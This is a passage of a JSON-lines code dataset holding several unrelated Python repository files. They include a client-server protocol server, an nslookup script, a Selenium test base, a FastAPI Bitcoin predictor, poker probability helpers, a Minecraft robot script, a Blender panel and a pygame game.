sendDATA_REJ(DATA_REJ, clientSocket, ip, port)\n clientSocket.close()\n return\n\n client = searchClient(packetReceived.Id_Trans)\n\n if packetReceived.Id_Comm != str(client.Id_Comm):\n debugMsg(\"Received an incorrect SEND_DATA packet [WRONG COMMUNICATION ID]\")\n DATA_REJ = TCP_PDU(servermodule.DATA_REJ, serverCfg.Id, \"0000000000\", packetReceived.Element,\n packetReceived.Value, \"[WRONG COMMUNICATION ID]\")\n DATA_REJ.send(clientSocket, client)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if client.Status != servermodule.SEND_ALIVE:\n debugMsg(\"Received SEND_DATA packet in status \" + statusToString(client.Status))\n clientSocket.close()\n return\n\n element = Element(packetReceived.Element, packetReceived.Value)\n\n if not element.isFrom(client):\n debugMsg(\"Received SEND_DATA packet with an element that doesn't match any of the stored\")\n DATA_NACK = TCP_PDU(servermodule.DATA_NACK, serverCfg.Id, client.Id_Comm, packetReceived.Element,\n packetReceived.Value, \"Element\" + packetReceived.Element + \"is not from client\")\n DATA_NACK.send(clientSocket, client)\n clientSocket.close()\n return\n\n debugMsg(\"Correct SEND_DATA packet received from client \" + client.Id)\n element.store(client, packetReceived.Info, packetReceived.Type)\n\n DATA_ACK = TCP_PDU(servermodule.DATA_ACK, serverCfg.Id, client.Id_Comm, packetReceived.Element,\n packetReceived.Value, client.Id)\n DATA_ACK.send(clientSocket, client)\n\n clientSocket.close()\n debugMsg(\"Ended thread for attending TCP requests from port \" + str(port))\n\n\ndef unpackTCP(bytesReceived: bytes):\n unpackedPacket = struct.unpack('B 11s 11s 8s 16s 80s', bytesReceived)\n packetType = unpackedPacket[0]\n packetId_Trans = unpackedPacket[1].split(b\"\\x00\")[0].decode()\n packetId_Comm = unpackedPacket[2].split(b\"\\x00\")[0].decode()\n packetElement = unpackedPacket[3].split(b\"\\x00\")[0].decode()\n packetElementValue = unpackedPacket[4].split(b\"\\x00\")[0].decode()\n packetInfo = unpackedPacket[5].split(b\"\\x00\")[0].decode()\n return TCP_PDU(packetType, packetId_Trans, packetId_Comm, packetElement, packetElementValue, packetInfo)\n\n\ndef packTCP(packet: TCP_PDU):\n packedPacket = struct.pack('B 11s 11s 8s 16s 80s', packet.Type, str(packet.Id_Trans).encode(),\n str(packet.Id_Comm).encode(), str(packet.Element).encode(),\n str(packet.Value).encode(), str(packet.Info).encode())\n return packedPacket\n\n\ndef sendDATA_REJ(DATA_REJPacket, socketToSend, ip, port):\n DATA_REJPacked = packTCP(DATA_REJPacket)\n socketToSend.sendall(DATA_REJPacked)\n debugMsg(\"Packet DATA_REJ sent correctly to \" + str(ip) + \":\" + str(port))\n\n\n# CONSOLE HANDLING FUNCTIONS\n\ndef handleTerminalInput(): # USER TERMINAL INPUT\n while 1:\n command = input(Colors.CYAN + \"➪\\t\")\n line = command.split(\" \")\n if len(line[0]) < 1:\n continue\n elif line[0] == \"list\":\n listCommand()\n elif line[0] == \"set\":\n setCommand(line[1:])\n elif line[0] == \"get\":\n getCommand(line[1:])\n elif line[0] == \"quit\":\n quitCommand()\n else:\n errorMsg(\"The command entered is incorrect!\")\n printAvailableCommands()\n\n\ndef quitCommand():\n exit(0)\n\n\ndef setCommand(line):\n if len(line) < 3:\n errorMsg(\"Error usage of set command!!\\n set <client_id> <element_id> <value>\")\n return\n\n clientId = line[0]\n elementId = line[1]\n elementValue = line[2]\n\n client = searchClient(clientId)\n element = Element(elementId, elementValue)\n\n if client is None:\n errorMsg(\"Client id not exists!\")\n return\n\n if element.isFrom(client) is False:\n errorMsg(element.Id + \" is not from \" + client.Id)\n return\n\n if len(elementValue) < 1 or len(elementValue) > 15:\n errorMsg(\"Element value can't be None or greater than 15 numbers\")\n return\n\n if elementId.split(\"-\")[2] == \"O\":\n errorMsg(\"You can't modify a sensor element!!\")\n return\n\n if client.Status != servermodule.SEND_ALIVE:\n errorMsg(\"Client \" + client.Id + \"isn't in status SEND_ALIVE. Can't do the operation!\")\n return\n\n # Correct set command entered\n\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.bind(('', 0))\n\n try:\n clientSocket.connect((client.IP_Address, int(client.TCP)))\n except socket.error:\n errorMsg(\"Can't connect with client for sending SET_DATA packet!\")\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n debugMsg(\"TCP connection established with \" + client.Id)\n\n SET_DATA = TCP_PDU(servermodule.SET_DATA, serverCfg.Id, client.Id_Comm, element.Id, element.Value, client.Id)\n SET_DATA.send(clientSocket, client)\n\n inputs, outputs, excepts = select.select([clientSocket], [], [], M)\n if len(inputs) == 0:\n print(Colors.WARNING + \"Client \" + client.Id + \"didn't answer to SET_DATA packet... resending information...\")\n clientSocket.close()\n return\n\n packetInBytes = clientSocket.recv(TCPPacketSize, socket.MSG_WAITALL)\n\n packet = unpackTCP(packetInBytes)\n if packet.Id_Trans != client.Id or packet.Id_Comm != str(client.Id_Comm) or packet.Element != element.Id:\n debugMsg(\"Received an incorrect \" + typeToString(packet.Type) + \" from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_NACK:\n print(Colors.WARNING + \"Received a DATA_NACK packet from \" + client.Id + \". Resending information...\")\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_REJ:\n debugMsg(\"Received a DATA_REJ packet from \" + client.Id)\n errorMsg(\"Element value rejected from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_ACK:\n debugMsg(\"Received a DATA_ACK packet from \" + client.Id)\n element.store(client, packet.Info, SET_DATA.Type)\n\n clientSocket.close()\n\n\ndef getCommand(line):\n if len(line) < 2:\n errorMsg(\"Error usage of get command!!\\n get <client_id> <element_id>\")\n return\n\n clientId = line[0]\n elementId = line[1]\n\n client = searchClient(clientId)\n element = Element(elementId)\n\n if client is None:\n errorMsg(\"Client id not exists!\")\n return\n\n if element.isFrom(client) is False:\n errorMsg(element.Id + \" is not from \" + client.Id)\n return\n\n if client.Status != servermodule.SEND_ALIVE:\n errorMsg(\"Client \" + client.Id + \"isn't in status SEND_ALIVE. Can't do the operation!\")\n return\n\n # Correct get command entered\n\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.bind(('', 0))\n\n try:\n clientSocket.connect((client.IP_Address, int(client.TCP)))\n except socket.error:\n errorMsg(\"Can't connect with client for sending GET_DATA packet!\")\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n debugMsg(\"TCP connection established with \" + client.Id)\n\n GET_DATA = TCP_PDU(servermodule.GET_DATA, serverCfg.Id, client.Id_Comm, element.Id, \"\", client.Id)\n GET_DATA.send(clientSocket, client)\n\n inputs, outputs, excepts = select.select([clientSocket], [], [], M)\n if len(inputs) == 0:\n print(Colors.WARNING + \"Client \" + client.Id + \"didn't answer to GET_DATA packet... resending information...\")\n clientSocket.close()\n return\n\n packetInBytes = clientSocket.recv(TCPPacketSize, socket.MSG_WAITALL)\n\n packet = unpackTCP(packetInBytes)\n\n if packet.Id_Trans != client.Id or packet.Id_Comm != str(client.Id_Comm) or packet.Element != element.Id:\n debugMsg(\"Received an incorrect \" + typeToString(packet.Type) + \" from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_NACK:\n print(Colors.WARNING + \"Received a DATA_NACK packet from \" + client.Id + \". Resending information...\")\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_REJ:\n debugMsg(\"Received a DATA_REJ packet from \" + client.Id)\n errorMsg(\"Element value rejected from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_ACK:\n debugMsg(\"Received a DATA_ACK packet from \" + client.Id)\n element.store(client, packet.Info, GET_DATA.Type)\n\n clientSocket.close()\n\n\ndef printAvailableCommands():\n print(Colors.UNDERLINE + \"\\tCOMMANDS AVAILABLE:\" + Colors.END)\n print(Colors.CYAN + \"\\t➵ set <client_id> <element_id> <value>\")\n print(\"\\t\\tSets a value to a client element\")\n print(\"\\t➵ get <client_id> <element_id>\")\n print(\"\\t\\tGets the value from a client element\")\n print(\"\\t➵ list\")\n print(\"\\t\\tLists all the clients with its stats, comm. id, ip addresses and elements\")\n print(\"\\t➵ quit\")\n print(\"\\t\\tExits the server closing all the buffers, sockets, etc.\")\n\n\ndef listCommand():\n print(Colors.WARNING + \"╔═══════════╦════════════╦══════════════╦═══════════════╦═════════════════════\")\n print(\"║ CLIENT ID ║ STATUS ║ COMM. ID\\t║ IP ADDRESS\\t║ ELEMENTS\")\n print(\"╠═══════════╬════════════╬══════════════╬═══════════════╬═════════════════════\")\n print(\"╚═══════════╩════════════╩══════════════╩═══════════════╩═════════════════════\")\n for i in range(len(clients)):\n actualClient = clients[i]\n print(\" \" + actualClient.Id + \" \" + statusToString(actualClient.Status) + \"\\t \" + str(\n actualClient.Id_Comm) + \"\\t \" + str(actualClient.IP_Address) + \"\\t \", end=\"\")\n for k in range(len(actualClient.Elements)):\n print(actualClient.Elements[k].Id, end=\" \")\n print(\"\")\n\n\n# AUXILIARY FUNCTIONS\n\ndef statusToString(status):\n if status == servermodule.DISCONNECTED:\n return \"DISCONNECTED\"\n elif status == servermodule.WAIT_INFO:\n return \"WAIT_INFO\"\n elif status == servermodule.REGISTERED:\n return \"REGISTERED\"\n elif status == servermodule.NOT_REGISTERED:\n return \"NOT_REGISTERED\"\n elif status == servermodule.WAIT_ACK_REG:\n return \"WAIT_ACK_REG\"\n elif status == servermodule.WAIT_ACK_INFO:\n return \"WAIT_ACK_INFO\"\n elif status == servermodule.SEND_ALIVE:\n return \"SEND_ALIVE\"\n else:\n return \"Unknown status\"\n\n\ndef typeToString(packetType):\n if packetType == servermodule.REG_REQ:\n return \"REG_REQ\"\n elif packetType == servermodule.REG_ACK:\n return \"REG_ACK\"\n elif packetType == servermodule.REG_NACK:\n return \"REG_NACK\"\n elif packetType == servermodule.REG_REJ:\n return \"REG_REJ\"\n elif packetType == servermodule.REG_INFO:\n return \"REG_INFO\"\n elif packetType == servermodule.INFO_ACK:\n return \"INFO_ACK\"\n elif packetType == servermodule.INFO_NACK:\n return \"INFO_NACK\"\n elif packetType == servermodule.INFO_REJ:\n return \"INFO_REJ\"\n elif packetType == servermodule.ALIVE:\n return \"ALIVE\"\n elif packetType == servermodule.ALIVE_NACK:\n return \"ALIVE_NACK\"\n elif packetType == servermodule.ALIVE_REJ:\n return \"ALIVE_REJ\"\n elif packetType == servermodule.SEND_DATA:\n return \"SEND_DATA\"\n elif packetType == servermodule.DATA_ACK:\n return \"DATA_ACK\"\n elif packetType == servermodule.DATA_NACK:\n return \"DATA_NACK\"\n elif packetType == servermodule.DATA_REJ:\n return \"DATA_REJ\"\n elif packetType == servermodule.SET_DATA:\n return \"SET_DATA\"\n elif packetType == servermodule.GET_DATA:\n return \"GET_DATA\"\n else:\n return \"Unknown packet type\"\n\n\ndef searchClient(clientId):\n for i in range(len(clients)):\n if clients[i].Id == clientId:\n return clients[i]\n return None\n\n\ndef packetFromAuthedUser(packet):\n userToSearch = packet.Id_Trans\n for i in range(len(clients)):\n if clients[i].Id == userToSearch:\n return True\n return False\n\n\n# FORMATTING FUNCTIONS\n\ndef errorMsg(text):\n print(Colors.FAIL + \"[ERROR] =>\\t\" + text + Colors.END)\n\n\ndef okMsg(text):\n print(Colors.GREEN + \"[OK] =>\\t\" + text + Colors.END)\n\n\ndef infoMsg(text):\n print(\"[INFO] =>\\t\" + Colors.UNDERLINE + Colors.HEADER + text + Colors.END)\n\n\ndef debugMsg(text):\n if debug_mode:\n print(Colors.BLUE + \"[DEBUG] =>\\t\" + text + Colors.END)\n\n\n# MAIN FUNCTION\n\nif __name__ == \"__main__\":\n try:\n checkParams()\n readCfgFile()\n readAuthFile()\n startServer()\n except KeyboardInterrupt:\n serverCfg.mainTCP.close()\n serverCfg.mainUDP.close()\n print(Colors.WARNING + \"\\n[WARNING] =>\\tSERVER EXITED ABRUPTLY\")\n exit(0)\n","repo_name":"peremunoz/Client-Server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":30423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13036903671","text":"#!/usr/bin/env python\nimport socket,re\n\ndef convert_to_decimal(ip):\n octets = ip.split('.')\n decimal = int(octets[0])*16777216 + int(octets[1])*65536 + int(octets[2])*256 + int(octets[3])\n return decimal\n\ndef convert_to_octets(decimal):\n a = int(decimal / 16777216)\n b = int(decimal / 65536) % 256\n c = int(decimal / 256) % 256\n d = int(decimal % 256)\n ip = str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d)\n return ip\n\ndef get_fqdn(ip):\n decimal = convert_to_decimal(ip)\n ip_format = convert_to_octets(decimal)\n resolved_ip = socket.gethostbyaddr(ip_format)\n print('===> I got %s for %s\\n' %(resolved_ip[0], resolved_ip[2]))\n\n\ndef get_ip(fqdn):\n resolved_name = socket.gethostbyname(fqdn)\n print('===> I got %s for %s\\n' %(resolved_name, fqdn))\n\n\ndef main():\n while True:\n print(\"Enter an IP address or a DNS name:\")\n ip_or_hostname = input()\n isIP = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n if isIP.match(ip_or_hostname):\n get_fqdn(ip_or_hostname)\n else:\n get_ip(ip_or_hostname)\n\nif __name__ == '__main__':\n main()\n","repo_name":"alexandre-k/python-programs","sub_path":"nslookup.py","file_name":"nslookup.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6532203843","text":"from ttl.selenium import SeleniumExt\nimport unittest\nfrom selenium import *\n\nclass PrmaxWebBase(unittest.TestCase):\n\t\"\"\" base class for selenium test\"\"\"\n\t# default selenium server details\n\t# this needs to be started before these test can be run\n\tseleniumHost = 'localhost'\n\tseleniumPort = str(4444)\n\n\t# browser info\n\tFireFox = FIREFOX\n\tChrome = CHROME\n\tIEExplorer = IE\n\tSafari = \"*safari\"\n\n\t# default browser\n\tbrowserStartCommand = \"*firefox\"\n\n\t# default login details\n\tusername = \"Chris\"\n\tpassword = \"qwert\"\n\n\t# default prmax location\n\tbrowserURL = \"http://localhost\"\n\n\n\tdef setUp(self):\n\t\t\"\"\" default test start function \"\"\"\n\t\tprint (\"Using selenium server at \" + self.seleniumHost + \":\" + self.seleniumPort)\n\t\tprint (\"Browser is \" + self.browserStartCommand)\n\n\t\tself.selenium = SeleniumExt(self.seleniumHost,\n\t\t\t\t\t\t\t\t\tself.seleniumPort,\n\t\t\t\t\t\t\t\t\tself.browserStartCommand,\n\t\t\t\t\t\t\t\t\tself.browserURL)\n\t\tself.selenium.start()\n\n\tdef tearDown(self):\n\t\t\"\"\" default stop\"\"\"\n\t\tself.selenium.stop()\n\n\tdef do_login(self):\n\t\t\"\"\" common method to make sure the user is logged in \"\"\"\n\t\tsel = self.selenium\n\t\tsel.open(\"/login\")\n\t\tsel.type(\"user_name\", self.username)\n\t\tsel.type(\"password\", self.password)\n\t\tsel.click(\"login\")\n\t\tsel.wait_for_page_to_load(\"30000\")\n\t\t# this is part of the default template\n\t\tself.assertEqual(\"Prmax Main\", sel.get_title())\n\t\t# this is needed fot all the js and pages to be build\n\t\tsel.wait(7)\n\n\tdef do_quick_outlet_name(self , search_text , count):\n\t\t\"\"\" does a basic search on the outlet name in the quick search form\n\t\tthis should always have at least on result \"\"\"\n\n\t\tself.do_login()\n\n\t\tsel = self.selenium\n\t\tsel.click_and_wait(\"dijit_form_Button_0\")\n\t\tsel.click(\"dijit_form_TextBox_1\")\n\t\tsel.type(\"dijit_form_TextBox_1\", search_text)\n\t\tsel.click_and_wait(\"std_search_search\", 7)\n\t\tself.do_check_result_count(sel, count )\n\n\tdef do_check_result_count(self, sel, count ):\n\t\tself.assertNotEqual(\"total: %d\" % count, sel.get_text(\"std_view_tb.countinfo\").lower())\n\n\tdef do_check_result_count_zero(self, sel ):\n\t\tself.assertEqual(\"total: 0\", sel.get_text(\"std_view_tb.countinfo\").lower())\n\n\n","repo_name":"meanang123/prmax","sub_path":"prmax/prmax/tests/selenium/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20568322566","text":"bs = int(input(\"geef bs in (1= ongehuwd, 2 = gehuwd, 3= weduwe(naar) \"))\nleeftijd = int(input(\"geef de leeftijd in\"))\n# ongehuwd 25 gehuwd 20 weduwe(naar) 15\n\nif bs == 1:\n lidgeld = 25\nelif bs == 2:\n lidgeld = 20\nelse:\n lidgeld = 25\nprint(\"lidgeld = \", lidgeld)\n","repo_name":"SemihAltintasPXL/PXLToegepast-Informatica","sub_path":"Vakken_eerste_jaar/IT-Essentials/IT-Essentials-oefeningen/3_condities/voorbeelden/opdracht 3.11a.py","file_name":"opdracht 3.11a.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"74286106753","text":"from pydantic import BaseModel\nimport numpy as np\nfrom joblib import load\nimport pathlib\nimport fastapi\n\napp = fastapi.FastAPI(title='Bitcoin Price Predictor')\n\nmodel = load(pathlib.Path('model/bitcoin-v10.joblib'))\n\nclass BitcoinPricePredictionData(BaseModel):\n open_price: float = 10000\n close_price: float = 10500\n volume: float = 1000000\n\nclass BitcoinPricePredictionOutput(BaseModel):\n price_prediction: float\n\n@app.post('/predict_price', response_model = BitcoinPricePredictionOutput)\ndef predict_price(data: BitcoinPricePredictionData):\n model_input = np.array([data.open_price, data.close_price, data.volume]).reshape(1,-1)\n result = model.predict(model_input)[0]\n\n return {'price_prediction': result}\n","repo_name":"JesusSaith/Bitcoin-Price","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13479274238","text":"# For line-by-line memory usage\n\n# Put code in a function\n# Wrap the function in a decorator\n\n#import line_profiler\n#profile = line_profiler.LineProfiler()\n#from memory_profiler import profile\n\n@profile\ndef my_func():\n a = [1] * (10 ** 6)\n b = [2] * (2 * 10 ** 7)\n del b\n return a\n\nif __name__ == '__main__':\n my_func()\n\n# Execute the code passing the option -m memory_profiler to the python interpreter\n# to load the memory_profiler module and print to stdout the line-by-line analysis\n\n# $ python -m memory_profiler example.py","repo_name":"AnaArabaci/sentiment_analysis","sub_path":"xxx.py","file_name":"xxx.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17218272015","text":"#!/usr/bin/env python3\nimport random\nimport math\nimport csv\nimport ast\nimport numpy as np\n#import tensorflow as tf\nimport sys\n#sys.path[0:0] = ['/Users/JackOHara/Desktop/code/Pythonprograms/Poker/Poker2']\nfrom pokergamehead import *\nfrom loadprobs import *\n\ndef return_com(game1):\n num = []\n suits = []\n for x in game1.community.cards:\n num.append(x.number)\n suits.append(x.cardsuit)\n num.sort()\n #print num, suits\n threekind = 0\n for x in num:\n if num.count(x) == 3:\n threekind = 1\n twopair, onepair = check_pairs(num)\n if onepair == False:\n onepair = 0\n if twopair == False:\n twopair = 0\n\n if onepair != 0:\n onepair = 1\n if twopair != 0:\n twopair = 1\n\n highcard = return_highcard(0, game1.community)\n flush = 0\n for x in suits:\n if suits.count(x) > flush:\n flush = suits.count(x)\n num = list(set(num))\n num.sort()\n straight = [0]\n for x in num:\n tempstraight = 0\n for y in range(5):\n if (x+y) in num:\n tempstraight += 1\n straight.append(tempstraight)\n straight = max(straight)\n \n '''\n y = 0\n #Following checks for straight, pain in butt to make; careful\n while y < 2:\n x = 0\n check = 0\n while x < 4:\n #print num[len(num) - 1 - x - y] - 1, num[len(num) - 2 - x - y]\n try:\n if num[len(num) - 1 - x - y] - 1 == num[len(num) - 2 - x - y]:\n check += 1\n else:\n straight.append(check)\n check = 0\n except:\n break\n x += 1\n y += 1\n straight = max(straight)\n '''\n returns = [threekind, twopair, onepair, highcard, flush, straight]\n return returns\ndef check_rnnprob(rounds, game1, player1):\n card1 = max(player1.cards[0].number, player1.cards[1].number)\n card2 = min(player1.cards[0].number, player1.cards[1].number)\n samesuit = 0\n if player1.cards[0].cardsuit == player1.cards[1].cardsuit:\n samesuit = 1\n if rounds == 0:\n probability = rnnopenprobs.get((card1,card2,samesuit), .2)\n else:\n player1.update_score(game1.community)\n handtype = player1.handscore.type\n handlevel = player1.handscore.level\n if rounds == 1:\n probability = rnnflopprobs.get((card1, card2, samesuit, handtype, handlevel), .2)\n elif rounds == 2:\n probability = rnnturnprobs.get((card1, card2, samesuit, handtype, handlevel), .2)\n elif rounds == 3:\n probability = rnnriverprobs.get((card1, card2, samesuit, handtype, handlevel), .2)\n return probability\ndef check_prob(rounds, game1, players):\n if rounds == 0:\n card1 = players.cards[0].number\n card2 = players.cards[1].number\n samesuit = 0\n if players.cards[0].cardsuit == players.cards[1].cardsuit:\n samesuit = 1\n probability = openprobs.get((card1,card2,samesuit), .1)\n move = 0\n if probability <= .35:\n move = 0\n elif probability >= .6 and game1.previousbet < 80:\n move = 2\n else:\n move = 1\n return move, probability\n game1.compare_score(game1.player1, game1.secondplayer)\n if rounds == 1:\n probability = flopprobs.get((players.handscore.type - 2, players.handscore.level - 2), .1)\n move = 0\n if probability <= .4:\n move = 0\n elif probability >= .7 and game1.previousbet < 80:\n move = 2\n else:\n move = 1\n return move, probability\n if rounds == 2:\n probability = turnprobs.get((players.handscore.type - 2, players.handscore.level - 2), .1)\n move = 0\n if probability <= .4:\n move = 0\n elif probability >= .75 and game1.previousbet < 120:\n move = 2\n else:\n move = 1\n return move, probability\n if rounds == 3:\n probability = riverprobs.get((players.handscore.type - 2, players.handscore.level - 2, players.handscore.high - 2), .1)\n move = 0\n if probability <= .35:\n move = 0\n elif probability >= .75 and game1.previousbet < 80:\n move = 2\n else:\n move = 1\n return move, probability\n return 0, 0\ndef return_highcard(playerhand, community):\n num = []\n suits = []\n for x in community.cards:\n num.append(x.number)\n suits.append(x.cardsuit)\n if playerhand:\n num.append(playerhand.cards[0].number)\n num.append(playerhand.cards[1].number)\n suits.append(playerhand.cards[0].cardsuit)\n suits.append(playerhand.cards[1].cardsuit)\n check, flush = check_flush(suits, num)\n if check:\n return flush[0]\n straight = check_straight(num)\n if straight:\n return straight\n three, full = check_full(num)\n if three and full:\n return three\n if three:\n templist = []\n for x in num:\n if x != three:\n templist.append(x)\n templist.sort(reverse=True)\n return templist[0]\n twopair, pair = check_pairs(num)\n if twopair and pair:\n templist = []\n for x in num:\n if x != twopair and x != pair:\n templist.append(x)\n templist.sort(reverse=True)\n try:\n return templist[0]\n except:\n return twopair\n if pair:\n templist = []\n for x in num:\n if x != pair:\n templist.append(x)\n templist.sort(reverse=True)\n return templist[0]\n num.sort(reverse=True)\n if playerhand:\n return max([playerhand.cards[0].number, playerhand.cards[1].number])\n return num[0]\n\n \n'''\nfor x in range(5):\n a = session()\n b = game(a)\n b.start(a, prin=True)\n b.flop(prin=True)\n b.river(prin=True)\n b.river(prin=True)\n print return_highcard(b.player1, b.community)\n'''\n","repo_name":"jpo1332/huholdem","sub_path":"checkprobs.py","file_name":"checkprobs.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19984883150","text":"from botchallenge import *\nfrom pathfindingUtils import *\nimport sys\n\ndef give_block(robot, TARGET_LIST):\n print(\"*** STARTING GIVE_BLOCK SCRIPT\")\n\n here = False\n ownerLoc = robot.get_owner_location()\n initialDist = int(robot.get_location().distance(ownerLoc))\n if initialDist < 5:\n face_owner(robot)\n here = True\n \n inventory = tuple_list_to_dict(robot.get_inventory())\n for blockType in TARGET_LIST:\n blockStr = str(blockType)\n if blockStr in inventory.keys():\n if not here:\n teleportThreshold = 20\n go_to_owner(robot, teleportThreshold)\n here = True\n qty = inventory[blockStr]\n message_all(robot, \"Here is all of my \" + blockStr.lower())\n robot.drop_item(blockType, qty)\n else:\n message_all(robot, \"I don't have any \" + blockStr.lower()\n + \" in my inventory.\")\n print(\"done!\")\n\ndef tuple_list_to_dict(tupleList): #hash by string\n resultDict = {}\n for tup in tupleList:\n resultDict[str(tup[0])] = tup[1]\n return resultDict\n\nTARGET_LIST_ARG = str(sys.argv[2])\nTARGET_LIST_ARG = TARGET_LIST_ARG[1:-1]\nTARGET_LIST_ARG = TARGET_LIST_ARG.split(',')\nTARGET_LIST_ARG = [x[:-1].split('(') for x in TARGET_LIST_ARG]\nTARGET_LIST_ARG = [BlockType(x[0], int(x[1])) for x in TARGET_LIST_ARG]\n\nrobot = Robot(str(sys.argv[1]), \"localhost\")\ngive_block(robot, TARGET_LIST_ARG)\n\nsys.exit() # make sure the program dies\n\n","repo_name":"jhaip/minecraft-put-that-there","sub_path":"command-scripts/giveblock.py","file_name":"giveblock.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73090450435","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# Hell is other people's code\n\nimport bpy\n\nclass VIEW3D_PT_wowbject_object_panel(bpy.types.Panel):\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"Item\"\n bl_label = \"WoWbject Properties\"\n\n @classmethod\n def poll(cls, context):\n if context.view_layer.objects.active:\n if context.view_layer.objects.active.WBJ.initialized:\n return True\n\n def draw(self, context):\n layout = self.layout\n root = layout.column(align=True)\n\n obj = context.view_layer.objects.active\n obj_props = obj.WBJ\n\n op = root.operator('wm.path_open', icon='IMAGE_BACKGROUND', text=\"Open Source Folder\")\n op.filepath = obj_props.source_directory\n\n\nclass VIEW3D_PT_wowbject_combiner_panel(bpy.types.Panel):\n bl_space_type = 'NODE_EDITOR'\n bl_region_type = 'UI'\n bl_category = \"WoWbject\"\n bl_label = \"WoWbject Combiners\"\n\n def draw(self, context):\n layout = self.layout\n root = layout.column(align=True)\n\n op = root.operator_menu_enum(\n \"wowbj.get_combiner\",\n \"combiner\"\n )\n\n if context.active_node:\n root.prop(context.active_node, \"location\")","repo_name":"ThatAsherGuy/WoWbjectImporter","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"15638106837","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 19 13:01:10 2018\n\n@author: 某树\n\"\"\"\n \nimport pygame\nimport game_functions as gf\n\nfrom boss import Boss\nfrom scoreboard import Scoreboard\nfrom button import Button\nfrom game_stats import GameStats\nfrom pygame.sprite import Group\nfrom settings import Settings\nfrom assassin import Ship\n\n\n#获取玩家电脑屏幕尺寸!!!\n\nmsg = \"\"\"操作提示:按空格键攻击,‘←’和‘→’键控制人物方向,‘esc’键退出游戏\"\"\"\n\ndef run_game():\n #初始化游戏并创建一个屏幕对象\n pygame.init()\n #pygame.mixer.init()\n font1 = pygame.font.SysFont(\"kaiti\",24)\n imgText = font1.render(msg,True,(0,0,0))\n ai_settings = Settings()\n screen = pygame.display.set_mode(\n (ai_settings.screen_width,ai_settings.screen_height),pygame.RESIZABLE)\n #窗口标题\n pygame.display.set_caption(\"别撞南墙\")\n \n #创建存储游戏统计信息的实力,并创建记分牌\n stats = GameStats(ai_settings)\n sb = Scoreboard(ai_settings,screen,stats)\n #创舰一艘飞船、一个子弹编组、一个外星人编组\n bullets = Group()\n ship = Ship(ai_settings,screen)\n boss = Boss(ai_settings,screen)\n aliens = Group()\n #创建外星人群\n gf.create_fleet(ai_settings,screen,ship,aliens)\n \n #sound = pygame.mixer.Sound('C:/LOP/python_work/donot_touch_the_south_wall/music/bgm.ogg')\n #创建play按钮\n play_button = Button(ai_settings,screen,\"开始游戏\") \n #开始游戏的主循环\n while True:\n \n gf.check_events(ai_settings,screen,ship,bullets,\n stats,play_button,aliens,sb)\n #sound.play()\n if stats.game_active:\n \n ship.update()\n gf.update_bullets(bullets,aliens,ai_settings,screen,ship,stats,sb,boss)\n gf.update_aliens(aliens,ai_settings,ship,screen,bullets,stats,sb,boss)\n gf.update_boss(boss,screen,stats,aliens,ai_settings,ship,bullets,sb)\n gf.update_screen(ai_settings,screen,ship,bullets,aliens,\n stats,play_button,sb,boss,imgText)\n #sound.stop\n \nrun_game()\n ","repo_name":"ibaomu/pygame_Donot_Touch_The_South_Wall","sub_path":"donot_touch_the_south_wall.pyw","file_name":"donot_touch_the_south_wall.pyw","file_ext":"pyw","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33904250431","text":"from mrjob.job import MRJob\nfrom mrjob.step import 